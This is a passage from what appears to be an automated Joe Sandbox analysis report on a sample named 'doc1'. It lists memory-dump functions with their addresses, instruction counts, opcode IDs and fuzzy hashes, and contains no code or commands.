                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e62fe27fad962a37e99fe863632c7d53e4d60a0fa3c2afe16c10861a72d09af7
                            • Instruction ID: 4a462fb8b6693b73ba8323959a50403fb2ccf058d3b92d38e02f46628c8aaa8a
                            • Opcode Fuzzy Hash: e62fe27fad962a37e99fe863632c7d53e4d60a0fa3c2afe16c10861a72d09af7
                            • Instruction Fuzzy Hash: D3E08CB1C04218DFCB54DFA8D5446ACBBF8AB08201F2000A8CD09A3210E6301A80DB40
                            Function 0576F299 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36be426ac4e41db693ba9db7892841c5ba40c9c34c06057a33cef0def5bd0949
                            • Instruction ID: a5aaab4e28cef7b2f0645a233b1fb1dfeb947d1faf8d6174ea35f09a516f280c
                            • Opcode Fuzzy Hash: 36be426ac4e41db693ba9db7892841c5ba40c9c34c06057a33cef0def5bd0949
                            • Instruction Fuzzy Hash: 99F0A578D05208CFDB54CF59D854A9DFBF2BB89300F248066D808A3254D7305D82CF04
                            Function 05A9CB48 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d45332e1801550290682f93ea0bad7a5501c8b9d2814315758a79a840f8b0ca
                            • Instruction ID: e36cfacf663acf85aa0e9dcbb653e22e7d2363221d9b345f5e12a863c3a39a96
                            • Opcode Fuzzy Hash: 5d45332e1801550290682f93ea0bad7a5501c8b9d2814315758a79a840f8b0ca
                            • Instruction Fuzzy Hash: 61E0C234D08208DBCF08EF94D980ABCBBF8EB85320F2081ACCC0827341CA315E46CB85
                            Function 057E8A30 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa6bab604a5757e019fd350d020a93feba24fcadb2ed8126eaacc899a7e642b8
                            • Instruction ID: 97019124c3dddaf5bf404badde9727013980fc6feac3b6bbd3b8458e959768bc
                            • Opcode Fuzzy Hash: aa6bab604a5757e019fd350d020a93feba24fcadb2ed8126eaacc899a7e642b8
                            • Instruction Fuzzy Hash: 0BD0A7323043149B4A1099E975404A6B7DDCBC91617148075E60DC3205E926CC0253E1
                            Function 057E8ABB Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 86a6a0c935b844746cff581c00e53fda18299cf65b30cf656d07cea0dbfb89ff
                            • Instruction ID: c1b569d40ea443dcf31067bb2caed719ef22894b36c3d70b152fa1beea6c912b
                            • Opcode Fuzzy Hash: 86a6a0c935b844746cff581c00e53fda18299cf65b30cf656d07cea0dbfb89ff
                            • Instruction Fuzzy Hash: 12D0A736B146024FEF209629F4627B733E3AB89254F185935E405CBB14FD21DC4557C1
                            Function 01060AEE Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8940407fdef03fb0cdb9f1ec45cbdb68a231ec7ad532a97704c9c6990fa749a0
                            • Instruction ID: a634c77e835cc62bf143fe638677f4122d11732d716add073dac8497b8cb12e0
                            • Opcode Fuzzy Hash: 8940407fdef03fb0cdb9f1ec45cbdb68a231ec7ad532a97704c9c6990fa749a0
                            • Instruction Fuzzy Hash: 96E0EC70C4920D9FCB80EFB9A94569E7FF4AA05214B4182A5E489E2601E67486558B91
                            Function 0106F0C8 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80fdd41d201de6a895a0aecd73815db77001cedfb83372fc939f95fa8de4dced
                            • Instruction ID: fdc8302696f42e9f3d70ad2885cb705c7143a71eb26de591649781927e765627
                            • Opcode Fuzzy Hash: 80fdd41d201de6a895a0aecd73815db77001cedfb83372fc939f95fa8de4dced
                            • Instruction Fuzzy Hash: 55E08C34908208DBD704DF98E8406BCBBB8EB85300F20C5A8984823340CA325E42CB80
                            Function 01069A78 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09013c238bfcab8a4666d18d40c3f247fdf44532c4256312b0863b17a0367a2e
                            • Instruction ID: 41f4db76ad0aa67a91fc34997c96b27be0a44e7e968bd5f230aa11471ba0c57a
                            • Opcode Fuzzy Hash: 09013c238bfcab8a4666d18d40c3f247fdf44532c4256312b0863b17a0367a2e
                            • Instruction Fuzzy Hash: FFE01272900208DFDB55EFF4D90879E7BFCEB4A201F1045A5E909A7250EB315E44DBA2
                            Function 05817DD8 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3b4bf657cd60e63c8c5bfd9a1501d4b51353da4e30a6b1989886381bd2740ce
                            • Instruction ID: 6a938a3dde89c3cdd23643c45845e55ad1c01e7b1c5d36c8e2bea74c96e3aae8
                            • Opcode Fuzzy Hash: b3b4bf657cd60e63c8c5bfd9a1501d4b51353da4e30a6b1989886381bd2740ce
                            • Instruction Fuzzy Hash: 58E08C3080824CDFC754DBA8C4406BCBBB8EB45205F2080EDCC4893341DA319E42CB40
                            Function 05816728 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3b4bf657cd60e63c8c5bfd9a1501d4b51353da4e30a6b1989886381bd2740ce
                            • Instruction ID: e151599613316fb30d58dd2e8464e04d313f4f2328a2448980b23b94004d6de1
                            • Opcode Fuzzy Hash: b3b4bf657cd60e63c8c5bfd9a1501d4b51353da4e30a6b1989886381bd2740ce
                            • Instruction Fuzzy Hash: 35E0C234808208DFC754DFA9C4402BCBFF8EB45205F2081E9CC9893341E6319E42CB40
                            Function 05813E28 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96275f851bcc8c1a158b8a8697a4d8a96479870505f54ae11d8b07edbd5f6911
                            • Instruction ID: 5f6528ff5bf3e2ace429ca64fe48bac5c64dce71f5586d42cf0343acab06857c
                            • Opcode Fuzzy Hash: 96275f851bcc8c1a158b8a8697a4d8a96479870505f54ae11d8b07edbd5f6911
                            • Instruction Fuzzy Hash: 93D05E71C8920CDBC714DFA4D845AADBBBCAB85301F6045A98C0463690CA301E85DB9D
                            Function 0576B0D8 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77c54fe58d05fe1c64ce9a9b39e5bc019576d8494b5ffe00ada7da4246494653
                            • Instruction ID: 89e51610e87f16581440d87bb35ebaf70ab48c6530bff35e6352484438030a65
                            • Opcode Fuzzy Hash: 77c54fe58d05fe1c64ce9a9b39e5bc019576d8494b5ffe00ada7da4246494653
                            • Instruction Fuzzy Hash: A5F05FB4E042298FCBA4CF24D89468ABBB5EB49315F1040E9D90EA3251DB355EC0CF19
                            Function 057EAF60 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 117cfcae0d939bea0f49f723396ab865766853a7dcfc1b3e930b9551309ac462
                            • Instruction ID: baad70ffe77e8039fd1468aaae8d1fd835ca6d61a8d29b4c2546ad90b3cf594b
                            • Opcode Fuzzy Hash: 117cfcae0d939bea0f49f723396ab865766853a7dcfc1b3e930b9551309ac462
                            • Instruction Fuzzy Hash: 8BD05EB6828344AFC7018B20C859CA57FB5FB6B631B568096FA44CB233D331DC49E755
                            Function 057ED278 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 336d3f4f35e595630948f024baff2a6d6e3b11e73b490513bf7a5b547f6edd40
                            • Instruction ID: 70bacaa40230c29d4fce3d16fd987cb10c17d90add08be1cdce74c70af1be2e3
                            • Opcode Fuzzy Hash: 336d3f4f35e595630948f024baff2a6d6e3b11e73b490513bf7a5b547f6edd40
                            • Instruction Fuzzy Hash: AFE0E2BA5483D49FCB528E289844CA47F79AE1A22431980CAE5809F263D225D819EB61
                            Function 0106F6C8 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eed1200ecf492777020920102b65d45b43014c49d740de61c89cad90bdfed196
                            • Instruction ID: 8016b95a0da4135a5c47b9ae34d7f50783669f08874f40360328f666a240115a
                            • Opcode Fuzzy Hash: eed1200ecf492777020920102b65d45b43014c49d740de61c89cad90bdfed196
                            • Instruction Fuzzy Hash: 89E012B0A0530CEBDB04EFB4F951B6D77FAEB45300F10C5A8E909A7285EA715F009B80
                            Function 0576FF20 Relevance: .0, Instructions: 17COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0aa608cb24bf1f32f615e380521a8a18ca994d89d238d68725d753572b689d70
                            • Instruction ID: 4cd305e3d52672a0aac29bdf968396f31a39977c3af4585b2f31abe9b54f55fe
                            • Opcode Fuzzy Hash: 0aa608cb24bf1f32f615e380521a8a18ca994d89d238d68725d753572b689d70
                            • Instruction Fuzzy Hash: 3AE01230A11208EFCB44EFB8E5107DDB7F9EB45314F1085A8940DE3345EA716F419B91
                            Function 0106D418 Relevance: .0, Instructions: 17COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f2b77b7260d82c3cfd2c3c13e7f3f3612619f6cdd09fde4163289acf6ebd9719
                            • Instruction ID: 03e91d2a497f057bf409065cb6e2b6ab84fadcb5877572d8af945b1497ea9076
                            • Opcode Fuzzy Hash: f2b77b7260d82c3cfd2c3c13e7f3f3612619f6cdd09fde4163289acf6ebd9719
                            • Instruction Fuzzy Hash: 8ED05E71A08108DBD754CF99D840AA9B7ACDB85214F208198984853351CA32AE02CB90
                            Function 0581ED78 Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e683b32590559c6760633daccfd033027941ce2e990d395dc419e5c55dbc1966
                            • Instruction ID: bfe1d007b0a83ec1f2c3288035ea82785ee6d375872374d51c119503ec5d1d86
                            • Opcode Fuzzy Hash: e683b32590559c6760633daccfd033027941ce2e990d395dc419e5c55dbc1966
                            • Instruction Fuzzy Hash: 61D0A771409308DBC714DFA898007797BBDDB01205F2004A8CC0492360C7314D40C745
                            Function 0576DE1B Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 31835e3afe90bb6893b971560d13567f1276c0060cd016afac89910b4da5d82b
                            • Instruction ID: 3481bbc5d80aaa9ba616799ef2a278bb9034a7e04ba210bd0b74422bd082216b
                            • Opcode Fuzzy Hash: 31835e3afe90bb6893b971560d13567f1276c0060cd016afac89910b4da5d82b
                            • Instruction Fuzzy Hash: C9E0C274A0122ACFCB70DF20D944BECBBB1BF59300F0040E9D459A2640E7700A84EF01
                            Function 01060B38 Relevance: .0, Instructions: 14COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 06143ee1e67e9bac7f660b42913add2d8c6bd104e575999485532602d56656dc
                            • Instruction ID: e61e361adeb297a2c4c03cff87e951b9009f1bf36a9bed17ef15f87aa829aeba
                            • Opcode Fuzzy Hash: 06143ee1e67e9bac7f660b42913add2d8c6bd104e575999485532602d56656dc
                            • Instruction Fuzzy Hash: 54D0C979350644DFC744AF69E858E257BBBFB8C62032084A4E909C7369EA31EC16CB50
                            Function 0581B241 Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b26acc19a83f5e537730113ce1b704f9fce2f330a2f1aeb8e3b1c7891182145
                            • Instruction ID: 8ed8f8a81148c31b720a4a816eb77f16c7342f371a890748187c33201b1763e3
                            • Opcode Fuzzy Hash: 6b26acc19a83f5e537730113ce1b704f9fce2f330a2f1aeb8e3b1c7891182145
                            • Instruction Fuzzy Hash: 2EE0BD798062288FDB60CF20C948BD9BBB2AB44305F0481E98409A22A1C7384ACACF04
                            Function 01069860 Relevance: .0, Instructions: 11COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9437f1f9789f0d19119e66b19e22a48ed4c80f3952496d4cf3bd23d0efad4050
                            • Instruction ID: 98cc4e18166f637310efda9050a7b24fb6170ad0ca86ee0180bf33ce6473055f
                            • Opcode Fuzzy Hash: 9437f1f9789f0d19119e66b19e22a48ed4c80f3952496d4cf3bd23d0efad4050
                            • Instruction Fuzzy Hash: D0C08C72040704CFE2793BE8F90D3293AACAB0220BF500070DA6D508B88F7244D4CBA6
                            Function 057660A2 Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58b0fcb50e892fbe526734294ca6198d66229ee34d12fd0de506d86681cc7a8d
                            • Instruction ID: ac323b1f22be16663570a9649d5c8acfba37d3a339bd836e81958b4460122a30
                            • Opcode Fuzzy Hash: 58b0fcb50e892fbe526734294ca6198d66229ee34d12fd0de506d86681cc7a8d
                            • Instruction Fuzzy Hash: D9D06CB8E04329DFDB24DF10E884B9DBBB2FB8A340F1090A9D819A3354DB301981DF02
                            Function 057EF458 Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58cd535f952a7853644cc3eaaa78223ddb12a549f077c0cb75df26ded21e243a
                            • Instruction ID: d1b8c7aca9dc80f6718dfe88b69edda5e88046329caf08347de11b92155e2d24
                            • Opcode Fuzzy Hash: 58cd535f952a7853644cc3eaaa78223ddb12a549f077c0cb75df26ded21e243a
                            • Instruction Fuzzy Hash: 7EC08CB248074047C7204BB0BD46BA23B60B312331F188216D0D0846ABD32E0212A701
                            Function 0106083A Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35155376d36be817ba8ad406a612f8fe746fefb236d5ae304d67d252e20c1a54
                            • Instruction ID: cd62f2e1d0e2a600f0376af5c2976f0efe1bd09172ae2f0c48e10268d1fda4cd
                            • Opcode Fuzzy Hash: 35155376d36be817ba8ad406a612f8fe746fefb236d5ae304d67d252e20c1a54
                            • Instruction Fuzzy Hash: 05C08C3055E381CFCF566770482608C3FE0DAC334434480EAA0A2FF697D8980A898751
                            Function 057668BA Relevance: .0, Instructions: 9COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d3d4b71643b7011ed6204270022e924b9d447323e75e07b43808ea799d13e9ac
                            • Instruction ID: c4b00a3a6628923d84597c130a02f2c66c1ca3fab1322f5307e5e3ba79f0b485
                            • Opcode Fuzzy Hash: d3d4b71643b7011ed6204270022e924b9d447323e75e07b43808ea799d13e9ac
                            • Instruction Fuzzy Hash: 70C00276E1001A9A8B00DAD9E4408DCB774EB94321B004427D614A6144D63115668F55
                            Function 05765F41 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad84073677ec97985af4190b4fc93377897854f82fa173d35a346852ee983eb8
                            • Instruction ID: fe889587279bd5db722f12ac26dd37d037197b4395fda414f2f18614b7370716
                            • Opcode Fuzzy Hash: ad84073677ec97985af4190b4fc93377897854f82fa173d35a346852ee983eb8
                            • Instruction Fuzzy Hash: 24D0EA74E153689FCBA4CF24D89879ABBB2FB0A300F4051E9E45AA3250DB741AC4DF02
                            Function 057EAF70 Relevance: .0, Instructions: 8COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                            Function 057EF468 Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c9c07d37bb8fb6cf0309a527e9db47170f5fff1525a682b70787f0f20909152
                            • Instruction ID: b5ecc1b032c3edd5b4911ff9f337c825e7456c4d2f3dc444e60b165ef44a2be9
                            • Opcode Fuzzy Hash: 7c9c07d37bb8fb6cf0309a527e9db47170f5fff1525a682b70787f0f20909152
                            • Instruction Fuzzy Hash: 52B09232000208AB86109E84EC04866BB6DAB59600720C025F609061168B33A822DB94
                            Function 01060B1C Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21ef7a23f9ac379f6eb5704d721477832f2b6b45d708b1f288f253058d889c7f
                            • Instruction ID: fafd7aa026c3cdec918fb6f647eaef2b1eae03be9e848901c1e1c2bf389bb856
                            • Opcode Fuzzy Hash: 21ef7a23f9ac379f6eb5704d721477832f2b6b45d708b1f288f253058d889c7f
                            • Instruction Fuzzy Hash: 8FB0123158C00CCA44104E65782403C3729CA8120D300D1C5B84E0A114CA1144204963
                            Function 057E1C0B Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4c5fc805232c69a6f522b018422ef25009c5150b72d82cca41d9560188ae267
                            • Instruction ID: 9779ba2a7923fa07da8e56d0d2e9e95a31effa1b5f5ca2957746852a04d487bf
                            • Opcode Fuzzy Hash: b4c5fc805232c69a6f522b018422ef25009c5150b72d82cca41d9560188ae267
                            • Instruction Fuzzy Hash: B3B012324940009E97599600CA0AB4D7751EB91320700C039A080C1418C7308850DAA0
                            Function 057E8AAB Relevance: .0, Instructions: 3COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f58c191c874f8b8ee564f40b76e5dc4ebbeb66da1b7497260f47281213f9ee36
                            • Instruction ID: 603501b149afd4167121a481b6cf632995b78abe0f482f692e4878ee6fddb04a
                            • Opcode Fuzzy Hash: f58c191c874f8b8ee564f40b76e5dc4ebbeb66da1b7497260f47281213f9ee36
                            • Instruction Fuzzy Hash:

                            Non-executed Functions

                            Function 058110F8 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: 00828e0041d56da374a34c9c4107c845f7ed990a1d02c5f2a6bd400feb729222
                            • Instruction ID: 770357086b839f3ec3b7238cc4fbbf75ff16bd361949701423403eaa3e06be78
                            • Opcode Fuzzy Hash: 00828e0041d56da374a34c9c4107c845f7ed990a1d02c5f2a6bd400feb729222
                            • Instruction Fuzzy Hash: 81810674E04208CFDB14EF69D488BAEBBFAFB89344F50A069D919E7295DB345885CF04
                            Function 058110E9 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: 14c99e67ebf3bcb5548d08b1fa74fa1dfb9c16c3560ad16cb6b819a3f4d479f0
                            • Instruction ID: d3bef941a7c49a0903f59c54b1a4160d5b1477b02590ba7d61bde14f5b899d86
                            • Opcode Fuzzy Hash: 14c99e67ebf3bcb5548d08b1fa74fa1dfb9c16c3560ad16cb6b819a3f4d479f0
                            • Instruction Fuzzy Hash: E2911574E04208CFDB14EF69D488BAEBBFAFB89344F109069D919E7295DB349885CF04
                            Function 05811339 Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: dccd0e6480a247dad7f1b5841093ea1e06e838916c3888e38f44721c01740826
                            • Instruction ID: 1af52282a7b5d34f4c70301d9196e1d19e9d4b042537829b3d615dfdf97724d6
                            • Opcode Fuzzy Hash: dccd0e6480a247dad7f1b5841093ea1e06e838916c3888e38f44721c01740826
